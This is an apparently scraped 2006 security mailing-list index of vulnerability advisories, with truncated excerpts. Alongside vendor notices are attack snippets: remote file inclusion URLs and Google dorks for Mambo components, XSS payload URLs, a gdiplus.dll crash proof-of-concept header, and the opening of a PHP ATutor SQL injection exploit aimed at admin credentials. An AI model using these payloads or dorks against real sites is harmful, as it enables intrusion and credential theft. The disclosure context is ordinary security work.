ATutor <= 1.5.3.1 'links' blind SQL injection / admin credentials disclosure 2006-07-30 rgod autistici org

com_moskool (admin.moskool.php) Remote File Include Vulnerabilities 2006-07-30 saudi unix hotmail com
    By saudi hackrz
    Risk : High
    ---------------------------------------
    test on this site : www.filters.ru
    ---------------------------------------
    google : allinurl:"com_moskool" or "moskool"
    Exploit : http://[target]/component/option,com_moskool/Itemid,34/admin.moskool.php ?mosConfig_absol

Re: cpanel login problem 2006-07-31 usar_y_tirar hushmail com
    This was reported some months ago on the Cpanel forums: http://forums.cpanel.net/showthread.php?t=45570 and is registered at Cpanel's bugzilla as bug #3392 http://bugzilla.cpanel.net/show_bug.cgi?id=3392 (Both links require registration.) Although it seems they will fix it, it's not deemed to b

Re: PHP ip2long() function circumvention 2006-07-29 darylf charter net
    I think you should have reported this as a MiniBB vulnerability (and I'm assuming you have). I don't know if I would really classify this as an issue with the PHP function, though it may require looking into. I recently discovered similar behavior in Windows resolving applications. I can't be certa

UPDATE: [ GLSA 200605-08 ] PHP: Multiple vulnerabilities 2006-07-30 Sune Kloppenborg Jeppesen (jaervosz gentoo org)

[ GLSA 200607-13 ] Audacious: Multiple heap and buffer overflows 2006-07-29 Matthias Geerdsen (vorlon gentoo org)

Gdiplus.dll division by 0 2006-07-28 Mr Niega gmail com
    #!/bin/perl
    # 0-day crash poc gdiplus.dll by Mr.Niega
    # Check out hex offset 2e play with the 2byte's,
    #set it to 20 if you want a non crashing ico file
    # [Division by zero]
    # this POC tested with:
    # win XP ENG sp2
    # And for SYS 49152 im that 0daysec guy ;)
    #
    #Rename Poc.ico to Poc.png and

[ MDKSA-2006:134 ] - Updated ruby packages fix safe-level vulnerabilities 2006-07-28 security mandriva com

artlinks Mambo Component <= Remote Include Vulnerability 2006-07-29 Dr Jr7 hotmail com
    # artlinks Mambo Component <= Remote Include Vulnerability
    # Risk : High
    # Class : Remote
    # Script : artlinks
    # Thanx : www.lezr.com/vb & All kuwait hackers
    # d0rkiz : allinurl:"com_artlinks"
    # http://www.site.com/components/com_artlinks/artlinks.dispnew.php?mosConf ig_absolute_path=

[ GLSA 200607-12 ] OpenOffice.org: Multiple vulnerabilities 2006-07-28 Stefan Cornelius (dercorny gentoo org)

mambatstaff Mambo Component <= Remote Include Vulnerability 2006-07-29 Dr Jr7 hotmail com
    # mambatstaff Mambo Component <= Remote Include Vulnerability
    # Risk : High
    # Class : Remote
    # Script : mambatstaff
    # Thanx : www.lezr.com/vb & All kuwait hackers
    # d0rkiz : allinurl:"com_mambatstaff"
    http://www.site.com/components/com_mambatstaff/mambatstaff.php?mosConfig _absolute_path

[KAPDA::#53] MYBB XSS and Dir Traversal in usercp.php 2006-07-29 roozbeh_afrasiabi yahoo com
    Vulnerable products : MYBB 1.x
    Vendor: http://www.mybboard.net
    Risk: Low
    Vulnerabilities: MYBB XSS and Dir Traversal in usercp.php
    Date :
    --------------------
    Found : Feb 22 2006
    Vendor Contacted : N/A
    Release Date : N/A
    About :
    --------------------
    MyBB is a powerful, efficient an

Mambo Gallery Manager v095.r3 Remote File Inclusion Vulnerabilities 2006-07-28 A-S-T2006 hotmail com
    ----------------------------------------------------
    Mambo Gallery Manager v095.r3 Remote File Inclusion Vulnerabilities
    ----------------------------------------------------
    Discovered By A-S-T TEAM
    WE ARE CrAsH_oVeR_rIdE & BLACK-CODE & MR-HCR
    -----------------------------------------

XSS vulnerability on AWBS 2006-07-29 newbinaryfile gmail com
    AWBS=Advanced Webhost Billing System
    Exploit;
    1.)http://[site adres]/contact.php?action=submit&Name='><script>alert('XSS Vulnerability')%3B</script>&EmailAddress=1&AccountUsername=1&Message=1
    2.)http://[site adres]/contact.php?action=submit&Name=1&EmailAddress=1&AccountUsername=' ><script>al

Re: Cisco VPN Concentrator IKE resource exhaustion DoS Advisory 2006-07-28 Eloy Paris (elparis cisco com)
    Hello, This is a Cisco PSIRT response to an advisory published on July 26, 2006 by an unaffiliated third party, Roy Hills, of NTA Monitor Ltd, entitled "Cisco VPN Concentrator IKE resource exhaustion DoS", and available at: http://www.nta-monitor.com/posts/2006/07/cisco-concentrator-dos.html This

Coppermine Photo Gallery v1.2.2b-Nuke Remote File Inclusion Vulnerabilities 2006-07-28 A-S-T2006 hotmail com
    ----------------------------------------------------
    Coppermine Photo Gallery v1.2.2b-Nuke Remote File Inclusion Vulnerabilities
    ----------------------------------------------------
    Discovered By A-S-T TEAM
    WE ARE CrAsH_oVeR_rIdE & BLACK-CODE & MR-HCR
    ----------------------------------

PHP ip2long() function circumvention 2006-07-29 rgod autistici org
    --- PHP ip2long() function circumvention --------------------------------------
    tested on php 5.0.2 " 4.3.3
    --------------------------------------------------------------------------------
    after some test on miniBB application (http://www.minibb.net/) I obtained that the php ip2long() fu

[USN-329-1] Thunderbird vulnerabilities 2006-07-28 Martin Pitt (martin pitt canonical com)
    ===========================================================
    Ubuntu Security Notice USN-329-1 July 28, 2006
    mozilla-thunderbird vulnerabilities
    CVE-2006-3113, CVE-2006-3802, CVE-2006-3803, CVE-2006-3804, CVE-2006-3805, CVE-2006-3806, CVE-2006-3807, CVE-2006-3809, CVE-2006-3810, CVE-2006

rPSA-2006-0139-1 httpd mod_ssl 2006-07-28 Justin M. Forbes (jmforbes rpath com)
    rPath Security Advisory: 2006-0139-1
    Published: 2006-07-28
    Products: rPath Linux 1
    Rating: Major
    Exposure Level Classification: Remote System User Deterministic Unauthorized Access
    Updated Versions: httpd=/conary.rpath.com@rpl:devel//1/2.0.59-0.1-1 mod_ssl=/conary.rpath.com@rpl:devel//1/

[ MDKSA-2006:133 ] - Updated apache packages fix mod_rewrite vulnerability 2006-07-28 security mandriva com

Hustle -- Tumbleweed Email Firewall Remote Vulnerability 2006-07-25 Ryan Smith (whatstheaddress gmail com)

cpanel login problem 2006-07-26 ali hackerz ir (1 replies)
    u can login to your account without username !
    example :
    your user name : hackerz
    your password : 123456
    u can login with only - pass : 123456
    ++++++++++++++++++++++++++++++++++++++++++++++

Lan-Aces Office Logic 2006-07-25 Mike chtechnology com
    Does anyone use this email client? I have to say it would be in your best interest to turn off html messages until I speak with tech support at Lan-Aces. If they do not respond within 24 hours I will post a huge security bypass exploit that works for all html & scripting blocking mechanism. With thi
<?
echo "ATutor <= 1.5.3.1 'links' blind SQL injection / admin credentials disclosure\n";
echo "by rgod rgod (at) autistici (dot) org [email concealed]\n";
echo "site: http://retrogod.altervista.org\n";
echo "dork, version specific: \"Web site engine's code is copyright\" \"2001-2006